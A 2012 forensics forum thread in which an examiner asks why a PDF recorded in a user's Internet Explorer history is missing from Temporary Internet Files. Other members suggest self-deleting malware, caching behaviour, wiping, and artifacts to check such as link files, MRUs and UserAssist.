where is the downlo...
 
Notifications
Clear all

where is the downloaded pdf file?

7 Posts
3 Users
0 Likes
563 Views
(@digitalcoroner)
Posts: 46
Eminent Member
Topic starter
 

I am trying to determine where the pdf file is that I see downloaded by a user by viewing their IE history. Log shows c\users\<userprofile>\AppData\Local\Microsoft\Windows\TemporaryInternetFiles\Low\Content.IE5\<IECreatedTempFolder>\<nameoffile>.pdf

I used a forensic tool to search for this specific file and ntuser.dat shows the above, however I cannot find the actual file. I searched registry keys for MRU, UserAssist, etc entries but nothing found. So what happened? Was the user able to open the file and was malware executed?

 
Posted : 05/12/2012 7:17 pm
jaclaz
(@jaclaz)
Posts: 5133
Illustrious Member
 

So what happened? Was the user able to open the file and was malware executed?

It is possible that it was a self-deleting (malware) file.

What do you mean with

however I cannot find the actual file.

How exactly were you looking for it?
(with which tools, exactly how)

It seems like you were looking for traces of it in logs and Registry, but what about the actual filesystem?

jaclaz

 
Posted : 05/12/2012 7:33 pm
(@digitalcoroner)
Posts: 46
Eminent Member
Topic starter
 

Search was performed using xways (keywords were the malicious domain and pdf file). Xways searches everything (filesystem, etc.).

 
Posted : 05/12/2012 7:55 pm
jaclaz
(@jaclaz)
Posts: 5133
Illustrious Member
 

Search was performed using xways (keywords were the malicious domain and pdf file). Xways searches everything (filesystem, etc.).

Then, try recovering each and every .pdf file in the filesystem, the particular file could have been renamed, moved and what not.

If the file was downloaded and the internet source address is still available, download a copy of it and use it's contents to get new "keywords" for a new search on the filesystem.

jaclaz

 
Posted : 05/12/2012 8:05 pm
(@digitalcoroner)
Posts: 46
Eminent Member
Topic starter
 

I did try to go to the site but its no longer available.

Thanks.

 
Posted : 05/12/2012 8:20 pm
(@timbo4664)
Posts: 12
Active Member
 

Have you searched for active and deleted link files, evidence of local file accesses in Internet History (file///) entries, as well as Registry MRUs to see if there are any other traces of the file?

I see that you have posted that the file is listed as being located in Temporary Internet Files, but could it be possible that the file was never cached to TIF, and maybe only viewed?? It would seem that if the file is actually listed as a file in TIF that it would be cached to disk, but maybe that isn't an absolute rule and some testing may be in order to determine this.

It could also have been downloaded, later deleted, and then overwritten (either by pure happenstance or purposefully with a file wiping tool that also cleans up MFT entries).

Just a couple of thoughts to help.

Tim Moniot

 
Posted : 06/12/2012 12:09 am
(@digitalcoroner)
Posts: 46
Eminent Member
Topic starter
 

Yes, I believe it may have only been viewed. If it were cached would it still be located in TIF? What setting determines if a file is cached (kept) or not? The folder the pdf file was downloaded to in TIF is still there and contains other files, but this specific pdf file is not there.

I did look for link files, UserAssist, MRU, etc. and no indication of file being opened. I know that some malware methodologies involve deleting downloaded fiiles after the malware was dropped. Perhaps this pdf contained script to download malware, but I don't see any indicators that malware was dropped.

Thank you.

 
Posted : 06/12/2012 3:03 pm
Share: